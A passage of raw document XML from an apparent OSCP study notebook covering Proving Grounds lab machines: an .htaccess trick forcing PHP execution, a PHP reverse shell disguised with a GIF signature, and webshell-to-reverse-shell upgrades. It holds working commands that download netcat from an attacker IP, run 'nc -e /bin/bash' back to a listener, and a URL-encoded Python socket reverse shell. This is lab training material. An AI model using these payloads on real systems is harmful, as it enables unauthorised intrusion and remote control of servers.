    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But with this .htaccess trick, you force Apache to interpret .xxx as PHP.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache checks .htaccess for AddType directives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP is registered with Apache as the handler for application/x-httpd-php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You basically “teach” Apache to treat your fake extension as PHP code.</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it doesn't work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If .htaccess files are disabled in Apache (AllowOverride None).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the web server isn’t Apache or doesn’t support .htaccess (e.g., Nginx, IIS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the app sanitizes uploads to block .htaccess.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If PHP isn’t running as an Apache module (e.g., php-fpm with Nginx).</w:t>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CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ez2o5der4e9c" w:id="136"/>
      <w:bookmarkEnd w:id="136"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shell as an image using GIF signature</w:t>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t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId338">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Blogger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we were able to leave a comment in the website as well as add an image. </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t xml:space="preserve">We first tried just changing the file extension from .php to .gif and this might work on some websites, but not this one</w:t>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And then we tried adding the GIF signature to the top of the reverse shell file. This tells the backend that this is a GIF. And we kept the file extension .php</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4386263" cy="1244180"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image74.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image74.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId339"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4386263" cy="1244180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The GIF signature is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GIF89a;</w:t>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t xml:space="preserve">And then once we uploaded it, we could click on "shell.php" in the comments, which executed the reverse shell and we got foothold</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6gxvond7ssqw" w:id="137"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading webshell to reverse shell</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rkp11qe6wm29" w:id="138"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nc</w:t>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t xml:space="preserve">On</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 19.3.2. Plink video,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we saw a neat way to use a webshell to get a reverse shell back to the Kali machine. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s how to do it on a Linux target (instead of windows)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>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t xml:space="preserve">This down below also was used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId340">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host nc (or any reverse shell payload) on Python server from Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the built-in netcat already on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the HTTP server to host the binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="216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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Linux webshell, run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use wget or curl to download nc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget http://192.168.118.4/nc -O /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this you are able to successfully upload to /tmp but the shell doesn't trigger, then try moving it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it's usually accessible by everyone, even www-data. We had to use this instead of /tmp in Relia Challenge Lab .246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This downloads the nc binary to /tmp/ and makes it executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also use curl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o /tmp/nc http://192.168.118.4/nc &amp;&amp; chmod +x /tmp/nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then use that /tmp/nc you just downloaded to connect back to Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/nc 192.168.118.4 4446 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change it to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sends a reverse shell from the Linux machine to your Kali listener on port 4446.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tket63w5ceja" w:id="139"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using python</w:t>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t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId341">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they got a PHP web shell. And then they enumerated Python version. And then they used a python rev shell (with URL encode) to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=python3%20--version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.181%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22bash%22)%27</w:t>
      </w:r>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wvn69iwdc2u1" w:id="140"/>
      <w:bookmarkEnd w:id="140"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Reverse Shells in Base64 for powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001102">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Umbraco </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
